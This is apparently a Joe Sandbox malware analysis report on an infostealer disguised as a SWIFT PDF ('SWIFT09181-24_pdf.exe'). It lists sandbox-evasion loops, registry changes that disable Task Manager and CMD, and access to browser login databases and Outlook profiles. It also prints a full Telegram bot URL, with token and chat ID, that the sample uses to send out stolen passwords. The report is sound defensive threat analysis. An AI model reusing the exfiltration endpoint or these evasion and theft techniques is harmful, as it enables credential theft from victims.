            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeRDTSC instruction interceptor: First address: 383617B second address: 383617B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE095583850h 0x00000006 cmp si, 7264h 0x0000000b cmp bh, ch 0x0000000d inc ebp 0x0000000e push ecx 0x0000000f mov ecx, 594355BFh 0x00000014 cmp ecx, 06h 0x00000017 jng 00007FE0955BE793h 0x0000001d pop ecx 0x0000001e inc ebx 0x0000001f cmp bl, FFFFFFA5h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeRDTSC instruction interceptor: First address: 238617B second address: 238617B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE0946B7E60h 0x00000006 cmp si, 7264h 0x0000000b cmp bh, ch 0x0000000d inc ebp 0x0000000e push ecx 0x0000000f mov ecx, 594355BFh 0x00000014 cmp ecx, 06h 0x00000017 jng 00007FE0946F2DA3h 0x0000001d pop ecx 0x0000001e inc ebx 0x0000001f cmp bl, FFFFFFA5h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeMemory allocated: 37930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeMemory allocated: 377E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeWindow / User API: threadDelayed 984Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 6072Thread sleep count: 984 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -599779s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe TID: 3896Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405846
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00406398 FindFirstFileW,FindClose,5_2_00406398
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeThread delayed: delay time: 599453Jump to behavior
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3762
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess created: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeQueries volume information: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT09181-24_pdf.exe PID: 6020, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT09181-24_pdf.exe PID: 6020, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT09181-24_pdf.exe PID: 6020, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT09181-24_pdf.exe PID: 6020, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT09181-24_pdf.exe PID: 6020, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SWIFT09181-24_pdf.exe24%ReversingLabsWin32.Trojan.Garf
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.208.238
            truefalse
              high
              drive.usercontent.google.com
              172.217.17.65
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comSWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/XaSWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.000000000745A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsSWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.org/0cSWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.000000000745A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://reallyfreegeoip.orgSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://reallyfreegeoip.orgSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073FE000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2809422403.0000000007404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.usercontent.google.com/:SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073FE000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2809422403.0000000007404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037995000.00000004.00000800.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://apis.google.comSWIFT09181-24_pdf.exe, 00000005.00000003.2755911965.0000000007407000.00000004.00000020.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000003.2756028021.0000000007407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.comSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorSWIFT09181-24_pdf.exefalse
                                                              high
                                                              https://drive.google.com/ISWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://api.telegram.orgSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.00000000379B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      104.21.67.152
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      193.122.130.0
                                                                      checkip.dyndns.comUnited States
                                                                      31898ORACLE-BMC-31898USfalse
                                                                      172.217.17.65
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      216.58.208.238
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1575477
                                                                      Start date and time:2024-12-15 18:27:05 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 23s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:6
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:SWIFT09181-24_pdf.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 95%
                                                                      • Number of executed functions: 119
                                                                      • Number of non-executed functions: 108
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: SWIFT09181-24_pdf.exe
                                                                      TimeTypeDescription
                                                                      12:30:01API Interceptor6x Sleep call for process: SWIFT09181-24_pdf.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.220file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                        RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                          3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      888.exeGet hashmaliciousLuca StealerBrowse
                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                          104.21.67.152TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              193.122.130.0file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              checkip.dyndns.comfile.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              reallyfreegeoip.orgShipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              api.telegram.orgRdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                              • 149.154.167.220
